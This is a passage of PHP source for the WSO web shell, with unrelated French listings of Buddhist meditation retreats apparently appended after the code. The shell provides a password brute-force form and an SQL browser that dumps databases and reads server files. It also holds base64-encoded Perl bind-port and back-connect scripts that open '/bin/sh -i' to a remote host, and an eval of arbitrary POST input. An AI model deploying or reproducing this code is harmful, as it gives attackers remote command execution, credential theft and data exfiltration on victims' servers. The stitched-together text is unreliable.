.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        
.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        
.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        
.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        
.'<td><input type=text name=login value="root"></td></tr>'
        
.'<tr><td><span>Dictionary</span></td>'
        
.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        
.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo 
'</div><br>';
    
wsoFooter();
}

function 
actionSql() {
    class 
DbClass {
        var 
$type;
        var 
$link;
        var 
$res;
        function 
DbClass($type)    {
            
$this->type $type;
        }
        function 
connect($host$user$pass$dbname){
            switch(
$this->type)    {
                case 
'mysql':
                    if( 
$this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 
'pgsql':
                    
$host explode(':'$host);
                    if(!
$host[1]) $host[1]=5432;
                    if( 
$this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return 
false;
        }
        function 
selectdb($db) {
            switch(
$this->type)    {
                case 
'mysql':
                    if (@
mysql_select_db($db))return true;
                    break;
            }
            return 
false;
        }
        function 
query($str) {
            switch(
$this->type) {
                case 
'mysql':
                    return 
$this->res = @mysql_query($str);
                    break;
                case 
'pgsql':
                    return 
$this->res = @pg_query($this->link,$str);
                    break;
            }
            return 
false;
        }
        function 
fetch() {
            
$res func_num_args()?func_get_arg(0):$this->res;
            switch(
$this->type)    {
                case 
'mysql':
                    return @
mysql_fetch_assoc($res);
                    break;
                case 
'pgsql':
                    return @
pg_fetch_assoc($res);
                    break;
            }
            return 
false;
        }
        function 
listDbs() {
            switch(
$this->type)    {
                case 
'mysql':
                        return 
$this->query("SHOW databases");
                break;
                case 
'pgsql':
                    return 
$this->res $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                break;
            }
            return 
false;
        }
        function 
listTables() {
            switch(
$this->type)    {
                case 
'mysql':
                    return 
$this->res $this->query('SHOW TABLES');
                break;
                case 
'pgsql':
                    return 
$this->res $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                break;
            }
            return 
false;
        }
        function 
error() {
            switch(
$this->type)    {
                case 
'mysql':
                    return @
mysql_error();
                break;
                case 
'pgsql':
                    return @
pg_last_error();
                break;
            }
            return 
false;
        }
        function 
setCharset($str) {
            switch(
$this->type)    {
                case 
'mysql':
                    if(
function_exists('mysql_set_charset'))
                        return @
mysql_set_charset($str$this->link);
                    else
                        
$this->query('SET CHARSET '.$str);
                    break;
                case 
'pgsql':
                    return @
pg_set_client_encoding($this->link$str);
                    break;
            }
            return 
false;
        }
        function 
loadFile($str) {
            switch(
$this->type)    {
                case 
'mysql':
                    return 
$this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                break;
                case 
'pgsql':
                    
$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
                    
$r=array();
                    while(
$i=$this->fetch())
                        
$r[] = $i['file'];
                    
$this->query('drop table wso2');
                    return array(
'file'=>implode("\n",$r));
                break;
            }
            return 
false;
        }
        function 
dump($table$fp false) {
            switch(
$this->type)    {
                case 
'mysql':
                    
$res $this->query('SHOW CREATE TABLE `'.$table.'`');
                    
$create mysql_fetch_array($res);
                    
$sql $create[1].";\n";
                    if(
$fpfwrite($fp$sql); else echo($sql);
                    
$this->query('SELECT * FROM `'.$table.'`');
                    
$head true;
                    while(
$item $this->fetch()) {
                        
$columns = array();
                        foreach(
$item as $k=>$v) {
                            if(
$v == null)
                                
$item[$k] = "NULL";
                            elseif(
is_numeric($v))
                                
$item[$k] = $v;
                            else
                                
$item[$k] = "'".@mysql_real_escape_string($v)."'";
                            
$columns[] = "`".$k."`";
                        }
                        if(
$head) {
                            
$sql 'INSERT INTO `'.$table.'` ('.implode(", "$columns).") VALUES \n\t(".implode(", "$item).')';
                            
$head false;
                        } else
                            
$sql "\n\t,(".implode(", "$item).')';
                        if(
$fpfwrite($fp$sql); else echo($sql);
                    }
                    if(!
$head)
                        if(
$fpfwrite($fp";\n\n"); else echo(";\n\n");
                break;
                case 
'pgsql':
                    
$this->query('SELECT * FROM '.$table);
                    while(
$item $this->fetch()) {
                        
$columns = array();
                        foreach(
$item as $k=>$v) {
                            
$item[$k] = "'".addslashes($v)."'";
                            
$columns[] = $k;
                        }
                        
$sql 'INSERT INTO '.$table.' ('.implode(", "$columns).') VALUES ('.implode(", "$item).');'."\n";
                        if(
$fpfwrite($fp$sql); else echo($sql);
                    }
                break;
            }
            return 
false;
        }
    };
    
$db = new DbClass($_POST['type']);
    if(@
$_POST['p2']=='download') {
        
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        
$db->selectdb($_POST['sql_base']);
        switch(
$_POST['charset']) {
            case 
"Windows-1251"$db->setCharset('cp1251'); break;
            case 
"UTF-8"$db->setCharset('utf8'); break;
            case 
"KOI8-R"$db->setCharset('koi8r'); break;
            case 
"KOI8-U"$db->setCharset('koi8u'); break;
            case 
"cp866"$db->setCharset('cp866'); break;
        }
        if(empty(
$_POST['file'])) {
            
ob_start("ob_gzhandler"4096);
            
header("Content-Disposition: attachment; filename=dump.sql");
            
header("Content-Type: text/plain");
            foreach(
$_POST['tbl'] as $v)
                
$db->dump($v);
            exit;
        } elseif(
$fp = @fopen($_POST['file'], 'w')) {
            foreach(
$_POST['tbl'] as $v)
                
$db->dump($v$fp);
            
fclose($fp);
            unset(
$_POST['p2']);
        } else
            die(
'<div class="base64" title='PHNjcmlwdD5hbGVydCgiRXJyb3IhIENhblwndCBvcGVuIGZpbGUiKTt3aW5kb3cuaGlzdG9yeS5iYWNrKC0xKTwvc2NyaXB0Pg==' ></div>

'
);
    }
    
wsoHeader();
    echo 
"

<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='"
htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' "
;
    if(@
$_POST['type']=='mysql')echo 'selected';
echo 
">MySql</option><option value='pgsql' ";
if(@
$_POST['type']=='pgsql')echo 'selected';
echo 
">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='"
. (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type=text name=sql_login value='"
. (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type=text name=sql_pass value='"
. (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
    
$tmp "<input type=text name=sql_base value=''>";
    if(isset(
$_POST['sql_host'])){
        if(
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch(
$_POST['charset']) {
                case 
"Windows-1251"$db->setCharset('cp1251'); break;
                case 
"UTF-8"$db->setCharset('utf8'); break;
                case 
"KOI8-R"$db->setCharset('koi8r'); break;
                case 
"KOI8-U"$db->setCharset('koi8u'); break;
                case 
"cp866"$db->setCharset('cp866'); break;
            }
            
$db->listDbs();
            echo 
"<select name=sql_base><option value=''></option>";
            while(
$item $db->fetch()) {
                list(
$key$value) = each($item);
                echo 
'<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo 
'</select>';
        }
        else echo 
$tmp;
    }else
        echo 
$tmp;
    echo 
"</td>

                <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" 
. (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
            </tr>
        </table>
        <div class="
base64" title='PHNjcmlwdD4NCiAgICAgICAgICAgIHNfZGI9JyIuQGFkZHNsYXNoZXMoJF9QT1NUWydzcWxfYmFzZSddKS4iJzsNCiAgICAgICAgICAgIGZ1bmN0aW9uIGZzKGYpIHsNCiAgICAgICAgICAgICAgICBpZihmLnNxbF9iYXNlLnZhbHVlIT1zX2RiKSB7IGYub25zdWJtaXQgPSBmdW5jdGlvbigpIHt9Ow0KICAgICAgICAgICAgICAgICAgICBpZihmLnAxKSBmLnAxLnZhbHVlPScnOw0KICAgICAgICAgICAgICAgICAgICBpZihmLnAyKSBmLnAyLnZhbHVlPScnOw0KICAgICAgICAgICAgICAgICAgICBpZihmLnAzKSBmLnAzLnZhbHVlPScnOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCgkJCWZ1bmN0aW9uIHN0KHQsbCkgew0KCQkJCWQuc2YucDEudmFsdWUgPSAnc2VsZWN0JzsNCgkJCQlkLnNmLnAyLnZhbHVlID0gdDsNCiAgICAgICAgICAgICAgICBpZihsICYmIGQuc2YucDMpIGQuc2YucDMudmFsdWUgPSBsOw0KCQkJCWQuc2Yuc3VibWl0KCk7DQoJCQl9DQoJCQlmdW5jdGlvbiBpcygpIHsNCgkJCQlmb3IoaT0wO2k8ZC5zZi5lbGVtZW50c1sndGJsW10nXS5sZW5ndGg7KytpKQ0KCQkJCQlkLnNmLmVsZW1lbnRzWyd0YmxbXSddW2ldLmNoZWNrZWQgPSAhZC5zZi5lbGVtZW50c1sndGJsW10nXVtpXS5jaGVja2VkOw0KCQkJfQ0KCQk8L3NjcmlwdD4=' ></div>

"
;
    if(isset(
$db) && $db->link){
        echo 
"<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty(
$_POST['sql_base'])){
                
$db->selectdb($_POST['sql_base']);
                echo 
"<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
                
$tbls_res $db->listTables();
                while(
$item $db->fetch($tbls_res)) {
                    list(
$key$value) = each($item);
                    if(!empty(
$_POST['sql_count']))
                        
$n $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                    
$value htmlspecialchars($value);
                    echo 
"<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
                }
                echo 
"<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                if(@
$_POST['p1'] == 'select') {
                    
$_POST['p1'] = 'query';
                    
$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                    
$db->query('SELECT COUNT(*) as n FROM ' $_POST['p2']);
                    
$num $db->fetch();
                    
$pages ceil($num['n'] / 30);
                    echo 
"<div class="base64" title='PHNjcmlwdD5kLnNmLm9uc3VibWl0PWZ1bmN0aW9uKCl7c3QoXCIiIC4gJF9QT1NUWydwMiddIC4gIlwiLCBkLnNmLnAzLnZhbHVlKX08L3NjcmlwdD4=' ></div>

<span>"
.$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo 
" of $pages";
                    if(
$_POST['p3'] > 1)
                        echo 
" <a href=# onclick='st(\"" $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if(
$_POST['p3'] < $pages)
                        echo 
" <a href=# onclick='st(\"" $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    
$_POST['p3']--;
                    if(
$_POST['type']=='pgsql')
                        
$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        
$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo 
"<br><br>";
                }
                if((@
$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                    
$db->query(@$_POST['p2']);
                    if(
$db->res !== false) {
                        
$title false;
                        echo 
'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
                        
$line 1;
                        while(
$item $db->fetch())    {
                            if(!
$title)    {
                                echo 
'<tr>';
                                foreach(
$item as $key => $value)
                                    echo 
'<th>'.$key.'</th>';
                                
reset($item);
                                
$title=true;
                                echo 
'</tr><tr>';
                                
$line 2;
                            }
                            echo 
'<tr class="l'.$line.'">';
                            
$line $line==1?2:1;
                            foreach(
$item as $key => $value) {
                                if(
$value == null)
                                    echo 
'<td><i>null</i></td>';
                                else
                                    echo 
'<td>'.nl2br(htmlspecialchars($value)).'</td>';
                            }
                            echo 
'</tr>';
                        }
                        echo 
'</table>';
                    } else {
                        echo 
'<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                    }
                }
                echo 
"<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty(
$_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo 
htmlspecialchars($_POST['p2']);
                echo 
"</textarea><br/><input type=submit value='Execute'>";
                echo 
"</td></tr>";
            }
            echo 
"</table></form><br/>";
            if(
$_POST['type']=='mysql') {
                
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if(
$db->fetch())
                    echo 
"<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
            if(@
$_POST['p1'] == 'loadfile') {
                
$file $db->loadFile($_POST['p2']);
                echo 
'<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
            }
    } else {
        echo 
htmlspecialchars($db->error());
    }
    echo 
'</div>';
    
wsoFooter();
}
function 
actionNetwork() {
    
wsoHeader();
    
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo 
"<h1>Network tools</h1><div class=content>

    <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
    <span>Bind port to /bin/sh [perl]</span><br/>
    Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
    </form>
    <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
    <span>Back-connect  [perl]</span><br/>
    Server: <input type='text' name='server' value='"
$_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>

    </form><br>"
;
    if(isset(
$_POST['p1'])) {
        function 
cf($f,$t) {
            
$w = @fopen($f,"w") or @function_exists('file_put_contents');
            if(
$w){
                @
fwrite($w,@base64_decode($t));
                @
fclose($w);
            }
        }
        if(
$_POST['p1'] == 'bpp') {
            
cf("/tmp/bp.pl",$bind_port_p);
            
$out wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
            echo 
"<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
            
unlink("/tmp/bp.pl");
        }
        if(
$_POST['p1'] == 'bcp') {
            
cf("/tmp/bc.pl",$back_connect_p);
            
$out wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
            echo 
"<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
            
unlink("/tmp/bc.pl");
        }
    }
    echo 
'</div>';
    
wsoFooter();
}
function 
actionRC() {
    if(!@
$_POST['p1']) {
        
$a = array(
            
"uname" => php_uname(),
            
"php_version" => phpversion(),
            
"wso_version" => WSO_VERSION,
            
"safemode" => @ini_get('safe_mode')
        );
        echo 
serialize($a);
    } else {
        eval(
$_POST['p1']);
    }
}
if( empty(
$_POST['a']) )
    if(isset(
$default_action) && function_exists('action' $default_action))
        
$_POST['a'] = $default_action;
    else
        
$_POST['a'] = 'SecInfo';
if( !empty(
$_POST['a']) && function_exists('action' $_POST['a']) )
    
call_user_func('action' $_POST['a']);
function 
FetchURL($url) {
         
$ch curl_init();
         
curl_setopt($chCURLOPT_USERAGENT"$cheader");
         
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
         
curl_setopt($chCURLOPT_HEADERfalse);
         
curl_setopt($chCURLOPT_URL$url);
         
curl_setopt($chCURLOPT_RETURNTRANSFER1);
         
curl_setopt($chCURLOPT_TIMEOUT30);
         
$data curl_exec($ch);
         if(!
$data) {
            return 
false;
         }
         return 
$data;
      }
exit;
?>
Private Shell - (c)oded by Death Burner
www.stealthers.in

Groupes d’Etude et de Pratique Dzogchen- Shenpen France- Sangha de Son Eminence Dzogchen Rinpoche

Groupes d’Etude et de Pratique Dzogchen- Shenpen France- Sangha de Son Eminence Dzogchen Rinpoche.

Toutes les versions de cet article :

28 décembre au 2 janvier - Retraite d’Hiver au Temple Zen du Pic Lumineux

C’est un moment favorable pour laisser tomber le poids de la vie et venir s’asseoir dans un recueillement complet et silencieux. Des enseignements simples et percutants dans une atmosphère détendue.

Toutes les versions de cet article :

29 novembre au 1er décembre - Retraite au Temple Zen du Pic Lumineux

Cette retraite en groupe est consacrée à la pratique intensive de zazen pendant plusieurs jours. Les journées sont rythmées par différentes activités, telles que le travail manuel, la détente, l’enseignement oral du maître.

Toutes les versions de cet article :

NOVEMBRE : Retraite de Méditation - Lâcher prise et Sourire

Les vieilles habitudes ont la vie dure ! Lâcher nos vieilles habitudes et adopter des pratiques plus saines pour notre vie n’est pas toujours facile, mais on peut se faire aider... avec le sourire !

Toutes les versions de cet article :

Pèlerinage sur le Chemin de St Jacques/ Soutien au GDI Europe - St-James Way Pilgrimage / GDI European Fundraising

Action de soutien au développement du Centre Européen Dzogchen dans le Sud Ouest de la France, sous l’égide de Son Eminence JIGME LÖSEL WANGPO, le Septième DZOGCHEN RINPOCHE.

Toutes les versions de cet article :

27 Décembre au 4 Janvier - Retraite de Méditation du Solstice d’Hiver

Notre retraite de méditation hivernale sera une précieuse occasion de réflexion et de renouveau lors du solstice d’hiver et de l’année nouvelle. Joignez-vous à nous pour ces quelques jours de méditation dans l`attention, la détente, le silence et la célébration. C’est une excellente façon de commencer l’année.

Toutes les versions de cet article :

Cours de Yoga Tibétain à Paris 4ème

Cours de Yantra Yoga à Paris Ouvert à tous.

Toutes les versions de cet article :

Zazen à Paris

Sangha boeddhisten zen de La Montagne Sans Sommet Lignage des Maîtres Niwa Zenji et Nishijima Roshi Dirigée par le moine Federico Dainin Joko san

Toutes les versions de cet article :

Le Voyage à Mundgod 2014

Immersion dans un monastère bouddhiste au sud de l’Inde.

Toutes les versions de cet article :

Tous les mercredis à 19h30 - Méditation guidée

Prsentation de différentes techniques de méditation suivi de discussion.

Toutes les versions de cet article :

0 | 10 | 20